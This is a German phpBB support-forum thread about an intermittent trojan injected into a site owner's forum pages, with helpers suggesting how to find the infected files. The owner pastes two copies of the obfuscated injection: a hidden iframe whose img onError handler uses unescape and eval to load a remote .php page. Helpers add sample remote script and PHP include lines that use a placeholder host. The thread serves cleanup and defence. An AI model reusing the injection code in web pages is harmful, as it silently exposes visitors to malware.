Trojaner wird beim Besuch geladen

[Ttahl]

Hallo,
wenn ich mein Forum besuche, dann wird ab und zu einer Trojaner geladen. Wenn der Trojaner geladen wird, dann ist folgender Code im Quelltext zu finden.

Code: Alles auswählen

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7123" height="1" width="1"><img src="about:blank" onError='ecxvrok=unescape("%27");bcnkvj=eval("document.getElementById("+ecxvrok+"ysryeyi"+ecxvrok+").src=unescape("+ecxvrok+"%68%74%74%70%3A%2F%2F"+ecxvrok+")+document.getElementById("+ecxvrok+"7123"+ecxvrok+").id+unescape("+ecxvrok+"%2E%69%6E%2F"+ecxvrok+")+"+ecxvrok+"1318777087"+ecxvrok+"+unescape("+ecxvrok+"%2E%70%68%70"+ecxvrok+")");document.getElementById("ysryeyi").src=bcnkvj' style="width:300;height:300;border:0px;"><iframe id="ysryeyi" src="about:blank"></iframe></div>

Ich habe nun alle Dateien auf den Desktop geladen und nach dem Code durchsucht, doch ohne Erfolg. Welchen Ansatzpunkt habe ich nun, um die infizierten Dateien zu finden?

Den Artikel - "Mein Forum wurde gehackt" werde ich natürlich auch arbeiten, doch das werde ich wohl erst am Dienstag schaffen. Bis dahin würde ich gerne die Infektion beseitigen.

[BNa]

Durchsuche mit einem Editor, der eine dateiübergreifende Suche erlaubt, alle Deine Board-Dateien nach

Code: Alles auswählen

ecxvrok

[Ttahl]

Ich habe eine Suche mit Dreamweaver und mit der erweiterten Suche von gedit nach dem Ausdruck gesucht. Er wurde in keiner Datei gefunden.

[BNa]

Benutze Notepad++ dazu

[Ttahl]

Jetzt habe ich mit Notepad++ eine Suche

• "Find in Files",
  Find what = ecxvrok,
  Filters = *.*,
  "in all sub-folders"

Keine Treffer. Das "komische" ist auch, dass bei mir uns anderen die Trojaner Warnung nur ab und zu kommt. Die meiste Zeit bleibt der Quelltext "clean".

[BNa]

Kann sein, das der Code via SQL generiert wird. Durchsuche alle Datenbanktabellen nach ecxvrok.
Ferner kann es ein JS oder php include() sein. Prüfe daher alle Dateien auf includes

templates

Code: Alles auswählen

<script type="text/javascript" src="http://www.nichtdeinboard.de/fremdlink.js"></script>

php

Code: Alles auswählen

include('http://www.nichtdeinboard.de/fremdlink.php'); 

Code: Alles auswählen

include('http://www.nichtdeinboard.de/fremdlink.js');  

Oder lande einen Glückstreffer mit der Suche nach

Code: Alles auswählen

http://

[Ttahl]

Die Suche in den Datenbanken brachte keinen Erfolg. Liegt auch daran, dass sich der Code ständig ändert.
Gerade war folgender Code im Quelltext vorhanden

Code: Alles auswählen

<br /><div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="3712" height="1" width="1"><img src="about:blank" onError='sluslsc=unescape("%27");vsrklu=eval("document.getElementById("+sluslsc+"bmbhjtk"+sluslsc+").src=unescape("+sluslsc+"%68%74%74%70%3A%2F%2F"+sluslsc+")+document.getElementById("+sluslsc+"3712"+sluslsc+").id+unescape("+sluslsc+"%2E%69%6E%2F"+sluslsc+")+"+sluslsc+"1318858861"+sluslsc+"+unescape("+sluslsc+"%2E%70%68%70"+sluslsc+")");document.getElementById("bmbhjtk").src=vsrklu' style="width:300;height:300;border:0px;"><iframe id="bmbhjtk" src="about:blank"></iframe></div>

Die Suche nach den beständigen Werten wie z.B. "%68%74%74%70%3A%2F" brachte auch keinen Erfolg.

Wie meinst du das mit "http://www.nichtdeinboard.de/fremdlink.js" woher bekomme ich die URL her. Das einzige, was ich sehe ist der o.g Code und die Meldung von antivir, was eine uebani.js als infiziert meldet

[Mahony]

Hallo
Wenn bei dir (im Forum) Dateien geändert wurden, dann liegt es mit großer Wahrscheinlichkeit daran, dass DU dir (auf deinem PC) einen Virus/Trojaner/Malware eingefangen hast. Die erste Maßnahme sollte also lauten, dass du deinen PC nach Viren|Trojanern|Malware scannst. Natürlich sollten im gleichen Zuge auch alle Passwörter geändert werden und frische phpBB3.0.x-Dateien verwendet werden.
Siehe dazu auch KB:gehackt


Grüße: Mahony

[BNa]

Wie meinst du das mit "http://www.nichtdeinboard.de/fremdlink.js" woher bekomme ich die URL her.

Das meint, das Du nach der Syntax suchen musst. Es sollte ein Fremdlink sein, also ein Link, der nach ausserhalb Deines Boards führt.

Das einzige, was ich sehe ist der o.g Code und die Meldung von antivir, was eine uebani.js als infiziert meldet

Wunderbar. Dann suche dateiübergreifend nach uebani.js.

Wenn es allerdings eine Infektion Deines Rechners sein sollte oder Du nichts Eindeutiges finden solltest,
befolge bitte alle Punkte im Link, den Dir Mahony in seinem Post gegeben hat.

KB:gehackt